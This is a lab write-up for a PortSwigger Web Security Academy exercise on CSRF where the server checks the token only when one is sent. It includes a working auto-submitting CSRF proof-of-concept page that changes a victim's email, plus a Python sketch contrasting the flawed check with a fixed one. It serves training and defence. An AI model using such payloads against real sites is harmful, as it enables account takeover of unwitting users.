Lab: CSRF where token validation depends on token being present

tags: Portswigger Web Security Academy Web
  • Description: This lab’s email change functionality is vulnerable to CSRF.
  • Goal: To solve the lab, use your exploit server to host an HTML page that uses a CSRF attack to change the viewer’s email address. You can log in to your own account using the following credentials: wiener:peter

Recon

  1. Log in and change the email address to capture the request. It is very similar to the previous lab: the request carries a CSRF_token parameter in its body:

  2. Try the first bypass method (removing the CSRF_token parameter entirely). It appears to work.

Exp - Delete CSRF_token directly to bypass

This is exactly the same as the first lab's payload; the form simply does not include the CSRF_token field, and because the server only validates the token when one is present, the request is accepted. Exploit payload:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <script>history.pushState('', '', '/')</script>

    <form action="https://0aa70059042bf55d80101c7a00930051.web-security-academy.net/my-account/change-email" method="POST">
      <input type="hidden" name="email" value="danger&#64;gmail&#46;com" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>
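The root cause of this lab, as an added example that is not part of the lab or the original write-up: a server-side validator that only compares the token when the request carries one, beside a fixed version that treats a missing or empty token as a failure. The session token, account emails and request bodies are constructed for the demo.

```python
import hmac
import secrets

# Constructed session state: the per-session token the server issued when it
# rendered the change-email form, plus the account's current email.
SESSION = {"csrf": secrets.token_hex(16), "email": "wiener@normal-user.net"}

# Body the hosted PoC form submits: only the email field, no csrf parameter.
CSRF_POC_BODY = {"email": "danger@gmail.com"}


def validate_csrf_lax(session, params):
    """Flawed check modelled on the lab: the token is only compared when the
    request actually carries one, so omitting the parameter skips the check."""
    submitted = params.get("csrf")
    if submitted is None:
        return True  # BUG: "no token" is treated as "nothing to validate"
    return hmac.compare_digest(session["csrf"], submitted)


def validate_csrf_strict(session, params):
    """Hardened check: the token is mandatory. Missing, empty and mismatching
    values are all rejected, using a constant-time comparison."""
    submitted = params.get("csrf")
    if not submitted:
        return False
    return hmac.compare_digest(session["csrf"], submitted)


def change_email(validator, session, params):
    """Simulated POST /my-account/change-email handler. Returns the email the
    account would hold after the request is processed (no state is mutated)."""
    if validator(session, params):
        return params["email"]
    return session["email"]


if __name__ == "__main__":
    print("lax   :", change_email(validate_csrf_lax, SESSION, CSRF_POC_BODY))
    print("strict:", change_email(validate_csrf_strict, SESSION, CSRF_POC_BODY))
```

With the lax validator the token-less PoC body changes the email; with the strict one the account is unchanged, while a request carrying the correct session token still succeeds.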

Success screenshot

Reference

  • Lab: CSRF where token validation depends on token being present
  • CSRF: Mastering CSRF from 0 to 1